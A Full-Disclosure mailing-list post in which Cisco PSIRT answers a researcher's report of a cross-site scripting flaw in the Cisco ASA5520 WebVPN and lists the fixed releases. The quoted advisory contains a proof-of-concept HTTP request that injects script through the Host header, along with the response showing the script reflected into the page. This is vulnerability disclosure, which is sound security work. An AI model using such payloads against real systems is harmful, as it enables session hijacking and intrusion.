Re: Cisco ASA5520 Web VPN Host Header XSS

["Mark-David McLaughlin (marmclau)" <marmclau () cisco com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This is the Cisco PSIRT response to an issue discovered and reported to
Cisco by Bugs NotHugs regarding a cross-site scripting vulnerability in
the
Cisco Adaptive Security Appliance (ASA) clientless SSL VPN feature.
Cisco
PSIRT greatly appreciates the opportunity to work with researchers on
security vulnerabilities, and welcomes the opportunity to review and
assist
in product reports. PSIRT would like to thank Bugs NotHugs for reporting
this issue to us. 

Cisco has release an IntelliShield Alert on this vulnerability, which is
available at:
http://tools.cisco.com/security/center/viewAlert.x?alertId=17950.  This
and
other IntelliShield Alerts are available off the Cisco Security Center
(www.cisco.com/security). 

Cisco is currently patching this vulnerability as Cisco bug ID
CSCsy82093
and the fixes will be available in 8.0.3.31, 8.1.2.22, and 8.2.0. These
images will soon be available for download at either
http://www.cisco.com/cgi-bin/tablebuild.pl/asa or
http://www.cisco.com/cgi-bin/tablebuild.pl/asa-interim. 

To check on the latest versions with fixed releases please consult the
Cisco Bug Toolkit
http://tools.cisco.com/Support/BugToolKit/action.do?hdnAction=searchBugs
.

- -----Original Message-----
From: Bugs NotHugs [mailto:bugsnothugs () gmail com] 
Sent: Tuesday, March 31, 2009 6:18 AM
To: bugtraq; fd
Subject: Cisco ASA5520 Web VPN Host Header XSS

- - Cisco ASA5520 Web VPN Host Header XSS

- - Description

Cross-site scripting.

- - Product

Cisco, ASA5520, IOS 7.2(2)22

- - PoC

Modified request:

POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://198.133.219.23/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR
1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66

username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=


Response:

HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
Content-Length: 5556

<html>
<!--
  Copyright (c) 2004, 2005 by Cisco Systems, Inc.
  All rights reserved.
 -->
<head>


<META http-equiv="PICS-Label" content='(PICS-1.1
"http://www.rsac.org/ratingsv01.html"; l gen true comment "RSACi North
America Server" for
"http://"&apos;><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org/+webvpn+/index.html" on
"2000.11.02T23:36-0800" r (n 0 s 0 v 0 l 0))'>

<meta http-equiv="Window-target" content="_top">
<title>WebVPN Service</title>


- - Solution

None

- - Timeline

2007-09-17: Vulnerability Discovered
2008-02-15: Disclosed to Vendor (auto-reply)
2009-04-02: Disclosed to Public (XSS is so 1999)

- -- 

BugsNotHugs
Shared Vulnerability Disclosure Account

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.9.0 (Build 397)
Charset: utf-8

wj8DBQFJ8dXP86n/Gc8U/uARAsAjAJwNOVQlrSq4+LtHjUh3ziZI24ikzgCfeccr
A139kRwCBvDNYK4EX0Wr30w=
=r3sK
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/